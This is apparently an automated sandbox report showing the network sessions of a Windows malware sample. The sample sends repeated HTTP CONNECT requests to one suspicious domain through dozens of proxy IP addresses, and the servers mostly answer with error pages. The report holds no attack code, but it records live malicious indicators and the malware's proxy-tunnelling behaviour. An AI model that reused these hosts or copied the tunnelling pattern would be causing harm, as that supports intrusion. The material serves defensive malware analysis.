                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                      Allow: POST,OPTIONS,HEAD,GET
                                                                                                      Content-Length: 331
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 43 4f 4e 4e 45 43 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for this URL.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      440192.168.2.45094036.134.91.8288886812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.540028095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.108660936 CET324INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.16.1
                                                                                                      Date: Fri, 23 Feb 2024 08:45:26 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Content-Length: 157
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      441192.168.2.451361154.208.10.126806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.543003082 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.707026958 CET309INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.23.1
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 157
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.1</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      442192.168.2.451400104.16.109.213806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.543895006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.631083965 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      443192.168.2.451405104.25.234.81806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.545469999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.632981062 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      444192.168.2.451144103.166.141.74200746812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.550430059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.924036980 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      445192.168.2.45057389.161.90.20356786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.550430059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      446192.168.2.451343149.62.193.9141536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.552649975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      447192.168.2.451413172.67.14.237806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.554157972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.641546011 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      448192.168.2.451414104.25.184.189806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.554168940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.641530991 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      449192.168.2.45142331.43.179.214806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.558022022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.645788908 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      450192.168.2.451164120.77.148.13880806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.574477911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.334410906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.657730103 CET309INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.23.3
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 157
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.3</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      451192.168.2.45143623.19.244.10910806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.580229998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      452192.168.2.45119427.77.237.9310806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.588709116 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      453192.168.2.451439172.67.36.21806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.589853048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.677939892 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      454192.168.2.45127158.234.116.197806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.589853048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      455192.168.2.451455104.16.81.76806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.591067076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.678809881 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      456192.168.2.451461104.21.124.121806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.600662947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.687841892 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      457192.168.2.451062222.223.103.23273026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.604914904 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.037353039 CET90INHTTP/1.1 200 OK
                                                                                                      Content-Type: application/json
                                                                                                      Connection: close
                                                                                                      Content-Length: 55


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      458192.168.2.45145867.43.236.20154276812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.606280088 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.338567019 CET19INHTTP/1.0 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      459192.168.2.451390174.77.111.19741456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.617212057 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      460192.168.2.451494172.67.182.0806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.617465019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.704466105 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      461192.168.2.45119549.228.131.16950006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.617470026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.980422974 CET340INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.12.2
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      462192.168.2.45150331.43.179.160806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.617541075 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
